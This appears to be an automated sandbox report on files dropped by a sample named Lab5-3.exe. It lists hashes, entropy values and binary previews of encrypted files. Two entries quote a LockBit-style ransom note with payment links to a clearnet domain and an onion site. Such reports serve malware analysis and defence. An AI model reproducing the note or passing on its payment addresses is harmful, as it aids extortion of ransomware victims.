                                                                                                          Preview:.9..(.z.......A..8{.x...e.....T<.,.I3....9.|.'&.?6.....~......E..%._.w..6.....MX..T.r....5#.&*.j....Vy@m...w...2C3!w..l.....0........(...w.?"E.L..2%H.\#.7fj....O.q-..5.a.|..c...:.m0A..?-....).VU...b[..d..Y:...!zz^..,.-..x4.s..3.K..\.:..9..E.t.PI....VQv.+0.<&.......w.C.Y.#...2.I.S.-.LG.ng.p..ZR..8..fq.u.6i,.e..x.5...kIQ\7.."...v.m.....Z.td..<=[..y6...............q]]{.!..<.....an...5%..n.{....ad.....$9.pj..D@V./.&h.....nR..&s..r...[&Oi.at..la.+.8.....mXD..`i...W\.H..To.............U7..[.~.M.q..._....a.g....r~/~..E...$.&.P.A).#.@l:..XEy....<...$:ev..2SO.<..h!...x.&...jG,.lY.Z.=...b....!.0...a....{....i.oE....q.yI..&S..&. fE...w.....{D9....2.-="..L.0....N#........c.....m8fV.2j.."Rc0.%s..>.....]./zP.<M..*..Ws.].[.J+.(w...C./.....4.7E.+.........z:."E.].?......]..#....22.=....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.902394138434957
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5PqC3/4ooFJ9pXjd5HfUTid3hBaUoSGFcmeykEdEElU92i:cCDob9/6Gx0uKeY2ElUJ
                                                                                                          MD5:2990F53B1AA15F55C2123446AB7A4A3E
                                                                                                          SHA1:443EF6C995132D94DFCE2985334BC36155738359
                                                                                                          SHA-256:99926E7E94B832375BDC944121026E7D0C4C4ADADD35D867DE4EA67BE87368D2
                                                                                                          SHA-512:2229101F3D491CA1240D20EBEC58863B8AE9C5ED468EAF4A6AFD710164CD91C7AEDE2C7071F8C05ECA68B8D05EADD275F631A818B029824CCE1D740CED96C7E9
                                                                                                          Malicious:false
                                                                                                          Preview:h....."..Q.q#.:..E+....PU.z..... .....Q...=G.'...o.._.....@$Nw.[s....7....z.H...2...P..HF-.....Y..sM....5...x..~3..(.......;......S.e...(V.NR.)...c;.Db.....Tz}.)..x.....>..1..@.2.\.hf.....$.&..M...'I...R..0....BJ]j.._n....#=.[...i.z.v)...kn....$.D.......4|ty....+A.'.U.H...*..t.V./..xsf......\@L$.>.=;.8:.:7..P..o.?pM...):i.h.3j.y.r..Z.../<z.K3vML.6E. ........<.._..a..Q.X7..p..#.Ln^...X.".>.`.D.....edB..5..:. o.bx!X.\...8M...A}Y)...VM.BJr.ai\......<.\..$...\e.4.=.E...5}O.yH9..@...+.P4....o.i!....0.Q.8.....l.c.N.#...5..a..{FV......z.Q.B.....ys..nM.l&.#*.r~.C].Qt6/....Lo.&.Az?c.......5...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2096
                                                                                                          Entropy (8bit):7.915790775704048
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:R5RYxNBQbqkIiaCo8tQHfUTid3hBaUoSGFcmeykEdEElU92i:R5RYXWA8tXGx0uKeY2ElUJ
                                                                                                          MD5:9ECA4DDB7567087AADC2BAA020DEDE50
                                                                                                          SHA1:F32AE7B0FD7C0DDC114864087F37C361F9770711
                                                                                                          SHA-256:C9FB7E2189F59E3080CC9A0AD99644FFF3539C4E75B1C8B9DF544EFF3D49192D
                                                                                                          SHA-512:085AA72038A1A68526687D2D4A9E412D1127BB00CA2320E16B114EC643455AEB49E05C8D959D32540CBEDFC10ECA114D51B99970ACCBB6B9AF08EA992B470057
                                                                                                          Malicious:false
                                                                                                          Preview:?^.MZ.aY{..g.4..,..l.k0...y!?..H..E....mRz..e{.B.....dD..VP....W.r.*.M8....uIJ.!......P.....,V.-.#...axb,.p...}%....@..C..2.A..t...*=....B..._r#_..#u.......&.....<.n.. ..?...*B.U..4...l...]=..].@......2...l..r.@.=*k.>.Wg*%..n.Dk.-;.GF.%&...9....n.K.......!q@C....\{.....7I..D..V\t.W.1....0..,b..#..O..P....N.|....8).........fD........j.l..b.U..6.'..$.....W8.~....V-.......L.b.....h.m..?...Vu.:.v..V........+.8..hA.....<.I.KS..%.)..q....l4....;SR.v...aB.xz.Xa8....V......R)...Zw.1.G.J$...1.D..e.j...r..t.%Vd.......x.k..U5..%...Mb_...c...E...`.5....D$GX.C.....!..I....%..PL@.F.R.p...{.:....O;.*A.#5.....Q.1#..WRe/W..2.>.._...........v......L6uV8.....[..2@..MV{..>.........~...;....@pI)....z.jv.AH!..q_!..V...&.";...+...N..e..D..........w..|.n%s:.Z...IKY..`yy.}H.y..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.981012023504034
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:pneHfeQfy82vTwKc0PqiTxuIJ6npq0dxFSK5fYU20Cb:pne2QQLI0PZTxuIJaEFKKtb
                                                                                                          MD5:FA2B3F90C658E7E97E7BF61F24945160
                                                                                                          SHA1:DA7A92F01F8E84C142E37FA2A87ECC1232BA4D94
                                                                                                          SHA-256:AF2A3D3A97756BA05AC8BAEC0DFBA40D5EF4526E664B2EB622F20799281AEF73
                                                                                                          SHA-512:AFC2235BDEF250CABF451EC689D7800E46B69CDED9738948E627712CC7B22F47603C5DE7EBF400D83082969528FF973C04FFEA05C550532FFB0899A1675E6B0B
                                                                                                          Malicious:false
                                                                                                          Preview:d)...{4.......z..g.%.2.8.r...y........#Z.p.9..s..b.]......sN.8.h.BB.P5..}.`..e...0].{h....?..%I4.mcZ.KrqR<.E?.rW..m..@8..!.<R....k...Zv..{..).p/....S+..TS..uU....N.._...O...Mf.SM._.'..t,._2.lv....f.&.7I.2...c...NK.No.R..ke.^..K.m. a..^(VGiJ..h".k...sd.m.mq.}>T....@....`bS=.^|...!Y'y;O..ME..1.....7(...C\.b.13..VZ.....|.D.]D%g.A...!1......;e.g..].......L.+.N.a.u...y.P.f.(~.,s,..oOY...h`...s1..eY...*(~;./xk...,]...#.:.:p..f~a....1u):[.T.......3.....z7&@E..m..<..Au.%Z...q..=..U`....-.1'M.2Js..`m.,..x.|...E..na..P..*.@bCd....,..-#.b..^.XU.I.......c............3h9[...&..R..&#...tg.N.Q]....j*..}.y..?3..m........;...7.{...%2...W.n1...l..b..1.M.A..8.E..1z.!.*.%.v.[.9. ..2....b.5..br{8z~>.!E..*.T.....*?|IL...Y.......&.=*..&y.E....I...~].....Q%<..i..H.4;.+.......7....Ozz..T..t.......dD..".....$....H^9fZ..Di....DX......{..J.Xj......(.:..A......W.(.B.......F.7_.iDj[....<...a. .........*.Y.^.m.!..a=*P...9n..k...g|H..\..5....`Ng..E...J......"..,`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.941164719691039
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5r4W4tHFiOwnhGRAErsKk9dX6jJ3f8//OrkogHHfUTid3hBaUoSGFcmeykEdEElk:5MRHFiOOeGdgBfafsGx0uKeY2ElUJ
                                                                                                          MD5:99D84BACF014155D91FD6EF1C69C6742
                                                                                                          SHA1:7468707B6369BA65D2D84850B2F2FC2E1803AFC4
                                                                                                          SHA-256:9FF17620CF895FEB17421241A4EE08DB359CC1455F442B6CCB5D0D986C3F078D
                                                                                                          SHA-512:D8A51D5749852FF33C2C047571F91D27B0113448F8E998C863ECDE34EE35B557151075CEE69790DC32FE12A74A42AA06643D2D9E7F9CDBAD09CB8CA461D30A00
                                                                                                          Malicious:false
                                                                                                          Preview:.........U<<.[.e.!..m...8.hz$........DTs.3}..}.M....,.....b...Oa.cF.X..K...A#.'.Y..k...55.....Z....J.uFP....mIL.G.W.Vcp.K.......1ql ...,m>.. .5'..^.f.......NVI.(a.......H...V.~..)....O3..p..ERC......9...L.;..{..%l0.<.....).y...6.X.......qt...._.d..../4.d..#..t......|...\Xv..(..j.......7MFJ..*^...R.r.P*]..F.W..E.k[^...*...N.>.......>'.nG...@.#....6.B.ON.K=.5....u......5..pQx.u.6...46..m.BT..v...h.\...A.....&r.x2.3v......4..I@.._%Y}......ku.G..T...,.#....Pu..;V.......".........)0m..........Y........w...y...i.e.U>O.I....}...@$.V....o1...."!...^....\I.M.h1.J...<.J....T5.*...h...&T......P..p<...!c....y....`...).z.A.....kw...+.4.x]..r...F..^}..o?.....nWV^...[....2.6.....2...%..L..........d.@......&...\...C.....@Uv...y.W.l}....T0f)....._l....y\Z....-.3J...<......9 ...<...`...B]+.K..AS.i....r......e.O....;._.n.M..........k..g.P;l.@..f.....8.G..@..R..ARl.?.ep3.#..R.)..^....f.O1.h.j.5..)2.....l9...E....".".y.Sbm.+.......D.<q;]u..3..!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.980518928782495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:wpNRXP/jzvd/FhMwt2hc0m4Wqxupm2ZBpbE3O6yqh8vcf8CCdAj8K0Cb:wpz/7zvBHmLspm2ZBv6Dmcf8XOoKtb
                                                                                                          MD5:923AE00C5B0232612DCE40000810CEA4
                                                                                                          SHA1:F2DE866F45B07D609B44480BFC40D0DBA9ED5CB2
                                                                                                          SHA-256:20CD5E66CE48506D82FE567AA0C644E6E73512C390C3CB5E5A92FCB82DABF537
                                                                                                          SHA-512:16B3D3B149DAD39F5D8F1D623051E3507A2F86ABF305E2E5DDE42F256FEBB569340AF97AC79F60F9B21E6FF4AA473DE567066B79E7E85DBE068F7B5DDECBFE06
                                                                                                          Malicious:false
                                                                                                          Preview:.....&2EJ....t[w...g(n..w.....8c.x_8.m..}..^<..E.z.[......w....x..(...E)....<..3.4.xC.t *..n}..[Qu.l.E.:.i....+F..x..K...X.ut.O.O.=......W.....R.u'...Y1.}...5.Q~l.\..N4?g.}7.9`t.hXa..jU.2.1vC.Y....sa.#..y............:}..jGL.f...[p....!).....-..W..i...,wvoc.......<...iO.e:.....a..(..E....pP.......?..Z.p%.....@`.<._..7.J....t.k.&..;..CG.y.Wl.7....RWR..Z...i........>..$...`.J.X.8(q^i.3u1Q.....8......G..v.a.yH..N.U.[....ZRSl.......t..........:4....N.7..d..qM......_.,....)i(U..L....F5.`..5.o...=.>.]I...@...V'gz.oJ.9.D.X.P"R..[.$........L....;..f..@....87....._=...........r.h..Dm.B.7mS.i.|......IHoq.|....:j&.xD6?C...h.r+F`...Y9..uO-....2..7.|...i...Y...)..0.I....g..}..P.'.y>.......!...>..&...\....jq....%e%x.3....v{..$^..^......0U....F2p.3ss.Ze.9...f:h1....JcX)..L.S.M.1Y..!j.I8..}.}c.5...32b...k...U.L...=......v(w....h...n6.0...U=.t..p...'..1.Q.6......V...>N@.C.v.7.4.b...../'. .yT..5..}8(HG2.....t.W..-Lv+i"!.. ...6:.o7M......\..F.....c..7F....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.938190812346092
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KBE7adcB6rmEBCSZwtF9zGRei7/C9dFW42jKSM3CJHfUTid3hBaUoSGFcmeykEdM:+Kk/BVZwtTGReqAdx2jKSMtGx0uKeY2b
                                                                                                          MD5:9F6AF4CA05F4EAF579E6EC9527A15237
                                                                                                          SHA1:8D2CACCD1AE3E3625DB029FD432D1D25230DE45F
                                                                                                          SHA-256:2A0F1FFE4418AEB800340B54B841797EA42D9B0B21DDFE582036334D6F76B5F9
                                                                                                          SHA-512:C78E2E544613BDFF8A96B86B21B98130F16C2A9307EEF16610FADF08A4C85C3659668786FDEBB61D10819723B69FB8D4C2340C7BD10526ED778F27DF1E3A6225
                                                                                                          Malicious:false
                                                                                                          Preview:.....8.$..~.....R^...u..y..N\.`.EG1\.&4-....RB...._.ln^."Is.......fW.i.:......$.i2.......@.J.:N..+U.5..!..2.."....m.!a:xP..O..]A..$N.Q........Gf5X..#+.$......Na0.2._...&..:^..2...'......S....W....4F........:..X..qA..V>.l.z...AlO....1..\HI|....i@..6.W..55.L.?l...........C/.\>N.....l......FG'S..4....`T..\.N]..zQG...jv-..aJ#.......$i:|..6x.)bg..l(UT.C..c#a.C.....aTq..V..e_..L"].b.`....F4..&kB.../.- .,2...;........P.^....Z..8...sE...c....\T..A.3.N..Tc.....9n........@..-:.x..].F# ...W....i'....'.....b..[...T......v. ....N...R.+.S....5~g.....(8....P.".2.I.`......CD.......8.."...db"...A.^Z.%.uZ.S....tE(.'^M..>n5.%......A./.5n.aP>..+..$o.......,B.p..(y0.k....L..W.-......^Q.....[l.Td..,>.F{?..Y."......Km...=..........9..%...Sz.K.<...Rc..P.[..is.Pt1(..]_..c.X.b.L...5....'..)...6.@...].:..:.........4.|.x.o.....V #$-...=...........x"..i....q&.,.8nZ`......4NSw{D.s*....3.V0..R..@..E...T........lJ..tb..7Eh.....Wt.6.%.kg\.......*2-.f.B;..RH..@..|}....V...(.N.n.s^
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.981934546515008
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xUItdLL8l69bIdqWn55YMzZQm6h/PDPq/Y0Cb:OIteEedd553Unu/Ytb
                                                                                                          MD5:471D52C7AF8F50509735C4E4E27BD4D3
                                                                                                          SHA1:F91780D9332B8915F0B78B1284170AC5C3EF0D28
                                                                                                          SHA-256:F1F76EC99AA123A00152BA259D429FD7A242AFA0591D6CD5FE7F7486368741AA
                                                                                                          SHA-512:F7CBBF579B8AD2EB644DA8351A8CD0A244ABBA290EA38A990B9576B4E15D61C2A94B3BEAE86B1B781321645F29EE32E057BD37A280EE7EE05BD90C63EC6A182F
                                                                                                          Malicious:false
                                                                                                          Preview:....iw?..i.ad..r..E.bJ 6......K.<..c.EJ..+.@.%..$"<H.....x.m....?...o.._.+..+j.8...0!E..%._...Z.V.......F1....=...7..pc.L.....?.l=...!>....p'.Q.0.G...ht>\O=..5.`.(.|..D...*pl.g.G..,.>.c..Ge...x9._9N..~.....e.....>J..~..[.o..v.a.H. .x.....^.z..e...b.w.....8.^......M.3......&........&..LNk....(VF.6iE....\=..1....2'..U.>6?.../.iY.J..{..Q..G .{`$....<.............7...J...j.o..|~.]...L....i....J..DM...x.....5../..'..y.JQ..}C....|1.@...kw.V.)Yj....*..X.h...`2r..Z..{o..4..y...!.k.z..M,.Ck.!.S..FUT.*.S...6...w...k..d.}7......F6...lB....F.....Y.?..>...........W.<..I~.K...h?!.!...!.Q1..`.....mg0.!d.P`..-....../.;..#3q.6.w.=$.w..uH.%a.....s*..t..v@I3UW....$..l....<....YA......c ..........:mu..e...D.l^W....?K.9...1...e.f.....-.T...d*d.Zq#.D.g#/.o7...>....'7`.BNu....n.`L%C.?.r*E&).A.r.|.y{..J..{..8l.LI&mv.g .#...C.....,>.,6.@..o.......=o.\B..[Q..:x.....`.B..ZLr...v.w..#m.+R.FV...H.>o5.3>(.`(yg.'..z.<...<..Cwt...>>{v.#.!&|.,.....YI
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.933011938958584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oi7RliVQscYcFOQ8Pa8zrleH2t7eHfUTid3hBaUoSGFcmeykEdEElU92i:oGRliVQNwiKGx0uKeY2ElUJ
                                                                                                          MD5:C1D1C267B915A88336A9714E135D9920
                                                                                                          SHA1:A449DD402E1AF643CF23309AFC2782AECF555E6C
                                                                                                          SHA-256:A77CFA68C57B0D044B1CC81EE0AFDCE8870D177265C18BE87AF056C64FC592E6
                                                                                                          SHA-512:AD576FF855A07DC0205011CAFB465406EBCC0F299F98F89948B38F03ECA7B6127AA56660EE5D47C9FFD1CEBDC96A1FDEC344857F4192179D21E8B9ABE9DA2B0C
                                                                                                          Malicious:false
                                                                                                          Preview:....W.4F.U.{..x.b.#1.A.Ob.C+m....$P3....W.^".z.W..r..g.o...n.`..q..3T.J0.}../m.C...M;..3.....j.A...q..%m..M#_.........{.*.X...P...z..q....%.N.x...&..W..@....;-....)v..p.....p.f.....~..!.\.."Q..V..&"..T6...I...wtv.V..5...Q.j..CE].K.4.'........3...Hf...m.a........$k.Z.e..........b.B..L.Z...a.Ih...|W.;P...X*.g.........V.....1.6.p...(.=.^.....c.O=.M..a..U.tA......'v.@7..V....(.4.w..?e..~,).4/..dO=......}U.E.Y(..^.j*...h...h%(^...?.b..g..7.j"....<.|..... ]?.oGm$6..hB...=...,..X........n...V[...pc\!.|a....A.$.l$.....z......z....B.=y..D8...54h-R S......=..P#...R.....r.W3.t.......w..Y.t..,/...:.,.....]...Msn...TT..E..B@.._op..U.....(.L...Nc..".S...f... .{H..;}@Q$.C.n=Nc.8Z.}..=...[...g..T.o...Wy....Tw~..(.!p(.....].{.s.>..j.m....r%z..V..;3r..S..._{....N..)..^6Q... .....Q....j...."..~D.y.s.'.Dmi5.D...*.../.y...M...J.......UN.zml.u.6.o....%^l.~...o.)...^...N..Tx....w.]U..........M...K..Y.....#le....$+....7.W....w'.../-.?...W..^......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.981298704640779
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZrsK5EeXIGb/wVQS0e0NWubD75ld/bp/FDBUf/XMF/Kg0Cb:ZrsKEeYGb/wKe0NW+73dDp5BUf/c/ttb
                                                                                                          MD5:E03D676F8467CD85F5FB6DC7DFFF9DE8
                                                                                                          SHA1:48C16947F01445F4626897A1D959C72A38D80131
                                                                                                          SHA-256:EDEFD298965B7C483A0F87C7B31D97CD51B6D15EB5AE632A84DB70853FF4B370
                                                                                                          SHA-512:5E72BF051A79E02953A7517DD7F1F9E2B28D2EF932768374A705937FD41B0DEA10D217A80CC343ACAD0BF1FCD2C31BA17054B5A5A999FD49E4F662E3DF9022D5
                                                                                                          Malicious:false
                                                                                                          Preview:\A2.....e...q...z.7.ZH=....W...B.I.. ...Y..}dl...+].KEV.i.e...p.w......aSj8:.$....g..hF...>..........8..R....2dN.....k.:.!...6f...E...v.....`..L.YX!.N.nv.=O..7g...=..........jW{f.?...=..N.u.a...Dx0t..n..At._^H.:3..S~.:..<R.O.p..........E._I....c...:.......]B.......y.>#..3.!...1..Q.=........l"X*{.=.r..%.....'nUS./..x..C..<nB.....J.Q!.{A.~.G.....>. ..A.qp...%&..oD.m.*H/..^..0.s.i...vE...ns...t...w0Hy5P\H.Io....=..Hm.2.n@.....H.V..&...p.\GQc..o.`.#I.aB.g.u1.h..AS.].$...'.~n...@e.m..H.o..$/q..x...P...0b......Z....._b.~L_..^..].-..c^.....Q....;l.D..........M\@.x....(.*?..zr..\..I.E?..U.1..oM........{..c....:U..@..%.7.7.{...)..J..... -.I9|g'..(.=.#+.....W..a;.....7.G.*.....zi5.....L..M.M.SG~.R..U|...z............p.....Q.kg...f...9'.g...M.%....(...*.._..1?v..........~M]...^...`^..j.xHf.._..T..w.... ..".+QB....|-.<#.R#._].n.:v.F.FT]T.WpB..(....iS......eC......~.g}.<..._9N)@f.D...+ .R.!.<Y....B.:h.I.f....T.reN..U|.E.....J..\......8....\.q.d.$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.920101286385073
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:egHViKilkSGlpTpOW9HlWwJO5IXSHfUTid3hBaUoSGFcmeykEdEElU92i:egC2lpTpPHlWw4uXNGx0uKeY2ElUJ
                                                                                                          MD5:119BBB1CD8E68B0B75B3478A44250876
                                                                                                          SHA1:AF979807FD77B7FB5F9DD9A9D63C46A41AAC4F22
                                                                                                          SHA-256:D5B1C0A2040F2C21F6259E183060EB9FF87A6DFE456CEBF1172B66BB5C6A9338
                                                                                                          SHA-512:A605E0845D30AE657D8EAF2B4D23208E2D06EA208F18A86E8A93A08B15636B3A210F336B5D0F6CF7D4F15830F526041E69BF164C1434B314B1F6FDCB3FF6AAA2
                                                                                                          Malicious:false
                                                                                                          Preview:.6..@._.r.. ....V...A#P..Gi.fI..;...K..w.E.&.f...^O..H...i.[.....[.k.)..(..kJ...t...#..e...7.h(w.P...^&.j.@9V8`n..8......L@sv._..6....a[............0.E!..C..A.Odq.d..O.l.zy..i\.=!O=.....V..BQ`M....y.:"..zH.@o.Z.i_..3..y..j...$Q.G.Y*7.X.......M..E.Y.8..Z_..........?.4.q.N..r5{Z.#^9#-)....&.m.Y....pC...?.6'd..=;v+..V.l.L...X...L.1...T...3(.........%.'...8.6R.l.V:.`...&=pV......S...7...JZ..w.........T.B....G...8].-.11..3!.k!8...T.^V..%.h?..\.s..y.,J.l..6z...*...!8b.G.FH..8[..V.3....h...../.o,8....2,=....Z..]..+......8H.U$.[.>hVl~..V<^`.Vf...k.].../.v..=......$. ..,@.c.._8oVD.X1..Ge.........T.S..."BA.NI+4..K5.C$ER\.2F.oaI.....@....-`.#...*.Y..R......C..q......A'dj.,...!....'..*M.x....b.@..V..HF......T.4...:.t|.<ik......TW...Io...Jc(^....s1.CPe...WbN......c....^0".`"...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5840
                                                                                                          Entropy (8bit):7.972025935692645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ZUsREe9k0Q+QfU+wq3paDymZJgg2NfNS7IbTJcaJP9uZ1Fzl40uiGx0uKeY2ElUJ:2Au0cwYa2MJgtxIkbuaJP9uZP7uB0Cb
                                                                                                          MD5:045384403D47C3176DE47814F4E4D0F2
                                                                                                          SHA1:AF28CF679CADB3F635C9B0EF370D98A214768747
                                                                                                          SHA-256:952B31AF68DED938BA977EAD249CA72DA125DF650E657CB6F4339537F3051BBD
                                                                                                          SHA-512:BF676860A862B3D574E55DC31C71607BFB92D7CE3F368F1B241E16BFAAA96DD2C5E575648EE6140304F4CE04EEBD74681E53EB1AECE6EC79AB0684F8C6A06419
                                                                                                          Malicious:false
                                                                                                          Preview:h.........7hm.?._G........0z.y%..| ..7.......r..IjY..U.......O...,...s.....Q..^.NL..g...(.OS.].....p..y1..&.."u.o......z...m.Ei.p.s.%.f..<.P...+.8..T../.....&.+.78G..<< ......R...3-!N..0O.g.v~..8....!..1.v...HK1*s.1..n.l.0.!......6K..1.....@.u.+\l0i&..<s..".y?k.N..(.K......2.AD.N.51..y.m.....u.:*.?"..].X&*.jl..y...Z...S:......P.8.8D=t..hw.......8.7.....j.h.e?H=.Av..|s.I..g...7..W.X.....z......U{T.~.......`F.....8.^0An.....T<.......[H..x...._.b.,l..N.w..Q.o..e..X.%.^L...k...e.b.#.4..{..a...c^.B.x.#..].i.w..x.Z<a]V..N7....uh?..2".=M.B6H.m.K.TzY|.Q..L..~..swZ....Xz?.3gB+.....g.7...b.(.r.G...WIN*.UU.rgU...,s.@......H.....O.ex....,c........J..,K.......m.#..SxB..1^........zn..x.......a...`[GO.T.*..*....+....=...."..r\.@e.........._....W..-.k.@.z.z,....3..z. ..w7.]w}...z.i.2?.....'.:>.W'p-.tm.@._'F.T.R)..fy.>..}..#Y"({%...s.y..Z>.8.....$..@:.>.....j).g.3.e..H. ..x/..Uo...~TaL....y&.....7...E...q.......6.j...c]....aJ..........vIM....^.fR/..5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.938408859012232
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZJ7eNxSUkpOYgQAIcwJNASCOXAvcQhrJjqVHfUTid3hBaUoSGFcmeykEdEElU92i:XeNruON/IcwJ2+MVWuGx0uKeY2ElUJ
                                                                                                          MD5:427F9D4299E126E46C29C282D03BC957
                                                                                                          SHA1:084740E969A0A7D7581F326B844533D294AE932E
                                                                                                          SHA-256:E1D0107CDF9F30A32DC8EF107C1A32B69ED182E9637113824DB5CB80716562A9
                                                                                                          SHA-512:C5053DFC5FAA7FCBD832ECE11AF836E7FC61F868E7E0F05F35ED48FFD811D258801119957B92FA8D8752328EA0EE0CC1EBC35B60397B4CF2B81E3DF2763D80F2
                                                                                                          Malicious:false
